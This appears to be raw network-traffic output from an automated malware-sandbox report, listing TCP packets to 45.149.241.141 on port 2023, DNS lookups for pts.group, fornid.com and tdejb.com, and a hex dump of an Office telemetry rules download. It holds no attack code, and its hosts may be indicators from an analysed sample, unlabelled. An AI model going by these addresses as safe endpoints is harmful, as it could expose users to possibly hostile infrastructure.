                                                                                                              Dec 5, 2024 10:39:30.082006931 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.082073927 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.082318068 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.083158016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.083339930 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.083408117 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.084342003 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.084511042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.084569931 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.085525990 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.085580111 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.085649967 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.086576939 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.086605072 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.086667061 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.087771893 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.087997913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.088073015 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.088871002 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.088962078 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.089057922 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.090039968 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.090109110 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.090178967 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.091171980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.091274977 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.091339111 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.092339039 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.092473984 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.092530012 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.093502998 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.093564987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.093617916 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.094599962 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.094737053 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.094818115 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.095772028 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.095825911 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.095902920 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.096883059 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.097006083 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.097067118 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.098031044 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.098097086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.098143101 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.099170923 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.099351883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.099394083 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.100361109 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.100505114 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.100801945 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.101466894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.101629972 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.101696014 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.102631092 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.102765083 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.102834940 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.103797913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.103880882 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.103936911 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.104896069 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.105058908 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.105135918 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.106097937 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.106250048 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.106352091 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.107199907 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.107386112 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.107434988 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.108414888 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.108540058 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.108607054 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.109627962 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.109771013 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.109837055 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.110635996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.110717058 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.110774040 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.111763954 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.111861944 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.111913919 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.112977982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.113045931 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.113085032 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.114099979 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.114254951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.114351034 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.115235090 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.115303040 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.115345955 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.116364956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.116561890 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.116607904 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.117501974 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.117758036 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.117801905 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.118833065 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.118907928 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.118974924 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.119728088 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.119844913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.119940042 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.120923042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.120971918 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.121045113 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.122059107 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.122158051 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.122209072 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.123270988 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.123538017 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.123605967 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:30.124367952 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.124469042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.125511885 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:30.125561953 CET499122023192.168.2.645.149.241.141
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 5, 2024 10:38:12.655484915 CET192.168.2.61.1.1.10x7607Standard query (0)www.pts.groupA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:21.056868076 CET192.168.2.61.1.1.10x6cdbStandard query (0)pts.groupA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:35.029690027 CET192.168.2.61.1.1.10x5343Standard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:11.241245031 CET192.168.2.61.1.1.10x7bdeStandard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:12.240135908 CET192.168.2.61.1.1.10x7bdeStandard query (0)www.tdejb.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.860980034 CET192.168.2.61.1.1.10x94eStandard query (0)time.facebook.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.861712933 CET192.168.2.61.1.1.10x793eStandard query (0)time.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.864334106 CET192.168.2.61.1.1.10x5f18Standard query (0)time.google.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.867671967 CET192.168.2.61.1.1.10x88abStandard query (0)ntp.time.nlA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.868900061 CET192.168.2.61.1.1.10x2db3Standard query (0)ntp1.hetzner.deA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.869764090 CET192.168.2.61.1.1.10x9ac3Standard query (0)ntp.time.in.uaA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.335382938 CET192.168.2.61.1.1.10x2cc3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.335382938 CET192.168.2.61.1.1.10x529cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.336122990 CET192.168.2.61.1.1.10x1d16Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.336303949 CET192.168.2.61.1.1.10x5b50Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 5, 2024 10:38:05.814254045 CET1.1.1.1192.168.2.60xf54No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:05.814254045 CET1.1.1.1192.168.2.60xf54No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:13.558433056 CET1.1.1.1192.168.2.60x7607No error (0)www.pts.grouppts.groupCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:13.558433056 CET1.1.1.1192.168.2.60x7607No error (0)pts.group68.66.226.116A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:21.197187901 CET1.1.1.1192.168.2.60x6cdbNo error (0)pts.group68.66.226.116A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:35.167937040 CET1.1.1.1192.168.2.60x5343No error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:35.167937040 CET1.1.1.1192.168.2.60x5343No error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:38:43.383213997 CET1.1.1.1192.168.2.60xb021No error (0)s-0005.s-dc-msedge.net52.113.195.132A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:13.008044958 CET1.1.1.1192.168.2.60x7bdeNo error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:13.008044958 CET1.1.1.1192.168.2.60x7bdeNo error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:13.008166075 CET1.1.1.1192.168.2.60x7bdeNo error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:13.008166075 CET1.1.1.1192.168.2.60x7bdeNo error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.998599052 CET1.1.1.1192.168.2.60x94eNo error (0)time.facebook.com129.134.25.123A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.998759031 CET1.1.1.1192.168.2.60x793eNo error (0)time.cloudflare.com162.159.200.123A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:35.998759031 CET1.1.1.1192.168.2.60x793eNo error (0)time.cloudflare.com162.159.200.1A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:36.001657009 CET1.1.1.1192.168.2.60x5f18No error (0)time.google.com216.239.35.12A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:36.001657009 CET1.1.1.1192.168.2.60x5f18No error (0)time.google.com216.239.35.0A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:36.001657009 CET1.1.1.1192.168.2.60x5f18No error (0)time.google.com216.239.35.8A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:36.001657009 CET1.1.1.1192.168.2.60x5f18No error (0)time.google.com216.239.35.4A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:36.006833076 CET1.1.1.1192.168.2.60x2db3No error (0)ntp1.hetzner.de213.239.239.164A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:36.007807016 CET1.1.1.1192.168.2.60x9ac3No error (0)ntp.time.in.ua62.149.0.30A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:36.251343012 CET1.1.1.1192.168.2.60x88abNo error (0)ntp.time.nl94.198.159.10A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:36.251343012 CET1.1.1.1192.168.2.60x88abNo error (0)ntp.time.nl94.198.159.14A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:47.852080107 CET1.1.1.1192.168.2.60x32f3No error (0)b-0005.b-dc-msedge.net13.107.9.158A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.473637104 CET1.1.1.1192.168.2.60x529cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.473664999 CET1.1.1.1192.168.2.60x2cc3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.473664999 CET1.1.1.1192.168.2.60x2cc3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.474515915 CET1.1.1.1192.168.2.60x5b50No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.474751949 CET1.1.1.1192.168.2.60x1d16No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                              Dec 5, 2024 10:39:52.474751949 CET1.1.1.1192.168.2.60x1d16No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              0192.168.2.64971813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:11 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:12 UTC471INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:11 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 218853
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public
                                                                                                              Last-Modified: Wed, 04 Dec 2024 18:36:58 GMT
                                                                                                              ETag: "0x8DD1492A2AADD99"
                                                                                                              x-ms-request-id: 88403f12-001e-00a2-039f-46d4d5000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093811Z-1746fd949bdjzh7thC1EWR3g6400000002hg000000004kwd
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:12 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                              Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                              Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                              Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                              Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                              2024-12-05 09:38:12 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                              Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
